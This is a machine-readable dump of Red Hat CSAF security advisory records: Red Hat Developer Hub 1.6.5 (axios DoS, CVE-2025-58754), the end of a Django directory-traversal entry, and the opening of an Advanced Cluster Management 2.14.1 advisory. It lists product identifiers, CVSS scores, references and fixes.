"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "django: Potential partial directory-traversal via archive.extract()"
}
]
}
rhsa-2025:16747
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Developer Hub 1.6.5 has been released.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Developer Hub (RHDH) is Red Hat\u0027s enterprise-grade, self-managed, customizable developer portal based on Backstage.io. RHDH is supported on OpenShift and other major Kubernetes clusters (AKS, EKS, GKE). The core features of RHDH include a single pane of glass, a centralized software catalog, self-service via golden path templates, and Tech Docs. RHDH is extensible by plugins.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:16747",
"url": "https://access.redhat.com/errata/RHSA-2025:16747"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-58754",
"url": "https://access.redhat.com/security/cve/CVE-2025-58754"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh",
"url": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh"
},
{
"category": "external",
"summary": "https://developers.redhat.com/rhdh/overview",
"url": "https://developers.redhat.com/rhdh/overview"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_developer_hub",
"url": "https://docs.redhat.com/en/documentation/red_hat_developer_hub"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-8805",
"url": "https://issues.redhat.com/browse/RHIDP-8805"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-8806",
"url": "https://issues.redhat.com/browse/RHIDP-8806"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-8811",
"url": "https://issues.redhat.com/browse/RHIDP-8811"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_16747.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Developer Hub 1.6.5 release.",
"tracking": {
"current_release_date": "2025-10-30T13:02:47+00:00",
"generator": {
"date": "2025-10-30T13:02:47+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.10"
}
},
"id": "RHSA-2025:16747",
"initial_release_date": "2025-09-25T11:13:18+00:00",
"revision_history": [
{
"date": "2025-09-25T11:13:18+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-09-25T11:13:27+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-10-30T13:02:47+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Developer Hub 1.6",
"product": {
"name": "Red Hat Developer Hub 1.6",
"product_id": "Red Hat Developer Hub 1.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhdh:1.6::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Developer Hub"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:7498105e03c741dd2ac9c39ad4ff9f22c4fee7dd40b2fd9c599996a7e67b3562_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:7498105e03c741dd2ac9c39ad4ff9f22c4fee7dd40b2fd9c599996a7e67b3562_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:7498105e03c741dd2ac9c39ad4ff9f22c4fee7dd40b2fd9c599996a7e67b3562_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-hub-rhel9@sha256%3A7498105e03c741dd2ac9c39ad4ff9f22c4fee7dd40b2fd9c599996a7e67b3562?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1.6.4-1758729326"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:533a3b5795440fb9a6d3baac83a69fab4ac0cd9cc02c9278eb3f764f769e60a9_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:533a3b5795440fb9a6d3baac83a69fab4ac0cd9cc02c9278eb3f764f769e60a9_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:533a3b5795440fb9a6d3baac83a69fab4ac0cd9cc02c9278eb3f764f769e60a9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-rhel9-operator@sha256%3A533a3b5795440fb9a6d3baac83a69fab4ac0cd9cc02c9278eb3f764f769e60a9?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1.6.4-1758727965"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:3b2cf972e1ced0a46d3559da4eb1a1b32c50457293ede4958a13538a84b45316_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:3b2cf972e1ced0a46d3559da4eb1a1b32c50457293ede4958a13538a84b45316_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:3b2cf972e1ced0a46d3559da4eb1a1b32c50457293ede4958a13538a84b45316_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-operator-bundle@sha256%3A3b2cf972e1ced0a46d3559da4eb1a1b32c50457293ede4958a13538a84b45316?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1.6.4-1758734301"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:7498105e03c741dd2ac9c39ad4ff9f22c4fee7dd40b2fd9c599996a7e67b3562_amd64 as a component of Red Hat Developer Hub 1.6",
"product_id": "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:7498105e03c741dd2ac9c39ad4ff9f22c4fee7dd40b2fd9c599996a7e67b3562_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:7498105e03c741dd2ac9c39ad4ff9f22c4fee7dd40b2fd9c599996a7e67b3562_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:3b2cf972e1ced0a46d3559da4eb1a1b32c50457293ede4958a13538a84b45316_amd64 as a component of Red Hat Developer Hub 1.6",
"product_id": "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:3b2cf972e1ced0a46d3559da4eb1a1b32c50457293ede4958a13538a84b45316_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:3b2cf972e1ced0a46d3559da4eb1a1b32c50457293ede4958a13538a84b45316_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:533a3b5795440fb9a6d3baac83a69fab4ac0cd9cc02c9278eb3f764f769e60a9_amd64 as a component of Red Hat Developer Hub 1.6",
"product_id": "Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:533a3b5795440fb9a6d3baac83a69fab4ac0cd9cc02c9278eb3f764f769e60a9_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:533a3b5795440fb9a6d3baac83a69fab4ac0cd9cc02c9278eb3f764f769e60a9_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-58754",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-09-12T02:00:53.897605+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:3b2cf972e1ced0a46d3559da4eb1a1b32c50457293ede4958a13538a84b45316_amd64",
"Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:533a3b5795440fb9a6d3baac83a69fab4ac0cd9cc02c9278eb3f764f769e60a9_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2394735"
}
],
"notes": [
{
"category": "description",
"text": "Axios is a promise based HTTP client for the browser and Node.js. When Axios prior to versions 0.30.2 and 1.12.0 runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: \u0027stream\u0027`. Versions 0.30.2 and 1.12.0 contain a patch for the issue.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios DoS via lack of data size check",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Availability impact is limited to the application which bundles axios and not the host Red Hat system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:7498105e03c741dd2ac9c39ad4ff9f22c4fee7dd40b2fd9c599996a7e67b3562_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:3b2cf972e1ced0a46d3559da4eb1a1b32c50457293ede4958a13538a84b45316_amd64",
"Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:533a3b5795440fb9a6d3baac83a69fab4ac0cd9cc02c9278eb3f764f769e60a9_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58754"
},
{
"category": "external",
"summary": "RHBZ#2394735",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394735"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593",
"url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/pull/7011",
"url": "https://github.com/axios/axios/pull/7011"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.12.0",
"url": "https://github.com/axios/axios/releases/tag/v1.12.0"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj",
"url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"
}
],
"release_date": "2025-09-12T01:16:40.513000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-09-25T11:13:18+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:7498105e03c741dd2ac9c39ad4ff9f22c4fee7dd40b2fd9c599996a7e67b3562_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:16747"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:7498105e03c741dd2ac9c39ad4ff9f22c4fee7dd40b2fd9c599996a7e67b3562_amd64",
"Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:3b2cf972e1ced0a46d3559da4eb1a1b32c50457293ede4958a13538a84b45316_amd64",
"Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:533a3b5795440fb9a6d3baac83a69fab4ac0cd9cc02c9278eb3f764f769e60a9_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:7498105e03c741dd2ac9c39ad4ff9f22c4fee7dd40b2fd9c599996a7e67b3562_amd64",
"Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:3b2cf972e1ced0a46d3559da4eb1a1b32c50457293ede4958a13538a84b45316_amd64",
"Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:533a3b5795440fb9a6d3baac83a69fab4ac0cd9cc02c9278eb3f764f769e60a9_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "axios: Axios DoS via lack of data size check"
}
]
}
rhsa-2025:19335
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Advanced Cluster Management for Kubernetes 2.14 General\nAvailability release images, which add new features and enhancements, bug\nfixes, and updated container images.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Advanced Cluster Management for Kubernetes 2.14 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in.\n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which add new features and enhancements, bug\nfixes, and updated container images. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://docs.redhat.com/en/documentation/red_hat_advanced_cluster_management_for_kubernetes/2.14/html-single/release_notes/index#acm-release-notes",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:19335",
"url": "https://access.redhat.com/errata/RHSA-2025:19335"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-47907",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-53547",
"url": "https://access.redhat.com/security/cve/CVE-2025-53547"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-58754",
"url": "https://access.redhat.com/security/cve/CVE-2025-58754"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-7195",
"url": "https://access.redhat.com/security/cve/CVE-2025-7195"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-7783",
"url": "https://access.redhat.com/security/cve/CVE-2025-7783"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-9287",
"url": "https://access.redhat.com/security/cve/CVE-2025-9287"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-9288",
"url": "https://access.redhat.com/security/cve/CVE-2025-9288"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_19335.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Advanced Cluster Management for Kubernetes 2.14.1 security update",
"tracking": {
"current_release_date": "2025-10-30T21:55:18+00:00",
"generator": {
"date": "2025-10-30T21:55:18+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.10"
}
},
"id": "RHSA-2025:19335",
"initial_release_date": "2025-10-30T12:58:23+00:00",
"revision_history": [
{
"date": "2025-10-30T12:58:23+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-10-30T12:58:31+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-10-30T21:55:18+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product": {
"name": "Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:acm:2.14::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Advanced Cluster Management for Kubernetes"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-cli-rhel9@sha256%3Ab7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"product_id": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cert-policy-controller-rhel9@sha256%3A738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"product_id": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-backup-rhel9-operator@sha256%3A84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-cluster-permission-rhel9@sha256%3A4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"product_id": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"product_identification_helper": {
"purl": "pkg:oci/config-policy-controller-rhel9@sha256%3Ae951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"product_id": "registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/console-rhel9@sha256%3Ab74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"product_id": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"product_identification_helper": {
"purl": "pkg:oci/endpoint-monitoring-rhel9-operator@sha256%3A5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-addon-controller-rhel9@sha256%3A1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-framework-addon-rhel9@sha256%3Ad8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"product_id": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multiclusterhub-rhel9@sha256%3A3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"product_id": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"product_identification_helper": {
"purl": "pkg:oci/governance-policy-propagator-rhel9@sha256%3Ab8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-grafana-rhel9@sha256%3A69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"product_id": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"product_identification_helper": {
